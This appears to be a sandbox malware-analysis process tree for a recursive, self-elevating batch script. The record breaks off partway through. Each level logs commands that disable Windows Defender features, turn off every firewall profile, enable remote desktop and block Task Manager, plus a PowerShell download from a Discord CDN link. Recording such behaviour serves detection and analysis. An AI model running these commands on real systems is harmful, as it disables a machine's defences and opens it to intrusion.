-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"40⤵PID:4676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"40⤵
- Blocklisted process makes network request
PID:3872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"40⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:4008 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"41⤵PID:1584
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"42⤵PID:1460
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f42⤵PID:1420
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"42⤵PID:3180
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f42⤵PID:3132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"42⤵PID:3008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"42⤵PID:4528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"42⤵PID:3548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"42⤵PID:3260
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"42⤵PID:1532
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable42⤵PID:3716
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE42⤵
- Modifies Windows Firewall
PID:2388
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off42⤵PID:364
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off42⤵
- Modifies Windows Firewall
PID:4572
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off42⤵PID:4492
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off42⤵PID:4172
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off42⤵
- Modifies Windows Firewall
PID:440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"42⤵PID:2868
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"42⤵PID:3684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"42⤵PID:1076
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"42⤵PID:4980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"42⤵PID:164
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"42⤵PID:1816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"42⤵
- Blocklisted process makes network request
PID:2228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"42⤵
- Command and Scripting Interpreter: PowerShell
PID:2740 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"43⤵PID:3872
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"44⤵PID:2256
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f44⤵PID:2004
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"44⤵PID:2852
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f44⤵PID:4608
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"44⤵PID:980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"44⤵PID:888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"44⤵PID:2488
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"44⤵PID:4236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"44⤵PID:420
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable44⤵PID:2472
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE44⤵PID:3256
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off44⤵PID:2992
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off44⤵PID:1840
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off44⤵
- Modifies Windows Firewall
PID:3344
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off44⤵
- Modifies Windows Firewall
PID:3036
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off44⤵PID:2744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"44⤵PID:528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"44⤵PID:2072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"44⤵PID:4580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"44⤵PID:4928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"44⤵PID:1456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"44⤵PID:3716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"44⤵
- Blocklisted process makes network request
PID:3520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"44⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:912 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"45⤵PID:4300
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV146⤵PID:4236
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"46⤵PID:4580
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f46⤵PID:2800
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"46⤵PID:5048
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f46⤵PID:2696
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"46⤵PID:4600
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"46⤵PID:880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"46⤵PID:2540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"46⤵PID:1968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"46⤵
- Command and Scripting Interpreter: PowerShell
PID:2916
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable46⤵PID:5100
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE46⤵PID:4180
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off46⤵PID:4116
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off46⤵PID:2992
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off46⤵
- Modifies Windows Firewall
PID:2524
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off46⤵PID:4088
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off46⤵
- Modifies Windows Firewall
PID:3392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"46⤵PID:4296
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"46⤵PID:528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"46⤵PID:3336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"46⤵PID:4504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"46⤵PID:456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"46⤵PID:208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"46⤵PID:1232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"46⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:1136 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"47⤵PID:3320
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"48⤵PID:3260
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f48⤵PID:4484
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"48⤵PID:5048
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f48⤵PID:1252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"48⤵PID:4592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"48⤵PID:2936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"48⤵PID:804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"48⤵PID:2324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"48⤵PID:4108
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable48⤵PID:764
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE48⤵PID:2220
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off48⤵PID:2732
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off48⤵PID:3240
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off48⤵PID:2072
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off48⤵
- Modifies Windows Firewall
PID:2004
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off48⤵PID:2524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"48⤵PID:1556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"48⤵PID:3344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"48⤵PID:2964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"48⤵PID:528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"48⤵PID:4108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"48⤵PID:4176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"48⤵
- Blocklisted process makes network request
PID:2740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"48⤵
- Command and Scripting Interpreter: PowerShell
PID:1632 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"49⤵PID:328
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"50⤵PID:2324
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f50⤵PID:736
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"50⤵PID:932
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f50⤵PID:1232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"50⤵PID:2704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"50⤵PID:4504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"50⤵
- Command and Scripting Interpreter: PowerShell
PID:3588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"50⤵PID:2276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"50⤵PID:3900
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable50⤵PID:3024
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE50⤵PID:4696
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off50⤵PID:5032
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off50⤵
- Modifies Windows Firewall
PID:2672
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off50⤵PID:2120
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off50⤵PID:2212
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off50⤵PID:3152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"50⤵PID:1584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"50⤵PID:4360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"50⤵PID:1624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"50⤵PID:4460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"50⤵PID:4976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"50⤵PID:1460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"50⤵
- Blocklisted process makes network request
PID:2220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"50⤵
- Command and Scripting Interpreter: PowerShell
PID:2176 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"51⤵PID:1748
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"52⤵PID:4180
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f52⤵PID:2776
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"52⤵PID:1624
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f52⤵PID:1400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"52⤵PID:1532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"52⤵PID:3024
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"52⤵PID:2052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"52⤵PID:460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"52⤵PID:1276
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable52⤵PID:4808
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE52⤵PID:4240
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off52⤵PID:1228
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off52⤵PID:2968
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off52⤵
- Modifies Windows Firewall
PID:3436
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off52⤵PID:720
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off52⤵PID:4576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"52⤵PID:4444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"52⤵PID:1100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"52⤵PID:4504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"52⤵PID:2472
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"52⤵PID:3344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"52⤵PID:4440
-
-
depth 52 | PID:4904 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')" | Blocklisted process makes network request
depth 52 | PID:2524 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs" | Command and Scripting Interpreter: PowerShell
depth 53 | PID:804 | C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
depth 54 | PID:2164 | C:\Windows\system32\reg.exe | reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
depth 54 | PID:3640 | C:\Windows\system32\reg.exe | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
depth 54 | PID:1924 | C:\Windows\system32\reg.exe | reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
depth 54 | PID:4504 | C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
depth 54 | PID:4208 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
depth 54 | PID:4872 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
depth 54 | PID:3344 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true"
depth 54 | PID:4940 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true"
depth 54 | PID:4088 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
depth 54 | PID:4504 | C:\Windows\system32\netsh.exe | netsh firewall set opmode disable
depth 54 | PID:4492 | C:\Windows\system32\netsh.exe | netsh firewall set opmode mode=DISABLE
depth 54 | PID:3076 | C:\Windows\system32\netsh.exe | netsh advfirewall set currentprofile state off
depth 54 | PID:1000 | C:\Windows\system32\netsh.exe | netsh advfirewall set domainprofile state off
depth 54 | PID:328 | C:\Windows\system32\netsh.exe | netsh advfirewall set privateprofile state off
depth 54 | PID:2916 | C:\Windows\system32\netsh.exe | netsh advfirewall set publicprofile state off
depth 54 | PID:2184 | C:\Windows\system32\netsh.exe | netsh advfirewall set allprofiles state off
depth 54 | PID:4208 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
depth 54 | PID:4872 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
depth 54 | PID:2752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
depth 54 | PID:5096 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true"
depth 54 | PID:2856 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true"
depth 54 | PID:3536 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
depth 54 | PID:836 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')" | Blocklisted process makes network request
depth 54 | PID:5060 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs" | Command and Scripting Interpreter: PowerShell; Modifies registry class
depth 55 | PID:2996 | C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
depth 56 | PID:2704 | C:\Windows\system32\reg.exe | reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
depth 56 | PID:4484 | C:\Windows\system32\reg.exe | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
depth 56 | PID:3344 | C:\Windows\system32\reg.exe | reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
depth 56 | PID:448 | C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
depth 56 | PID:4376 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
depth 56 | PID:912 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
depth 56 | PID:616 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableScriptScanning $true"
depth 56 | PID:4488 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableEmailProtection $true"
depth 56 | PID:2292 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
depth 56 | PID:448 | C:\Windows\system32\netsh.exe | netsh firewall set opmode disable
depth 56 | PID:3640 | C:\Windows\system32\netsh.exe | netsh firewall set opmode mode=DISABLE | Modifies Windows Firewall
depth 56 | PID:4040 | C:\Windows\system32\netsh.exe | netsh advfirewall set currentprofile state off | Modifies Windows Firewall
depth 56 | PID:2052 | C:\Windows\system32\netsh.exe | netsh advfirewall set domainprofile state off
depth 56 | PID:3524 | C:\Windows\system32\netsh.exe | netsh advfirewall set privateprofile state off | Modifies Windows Firewall
depth 56 | PID:3652 | C:\Windows\system32\netsh.exe | netsh advfirewall set publicprofile state off
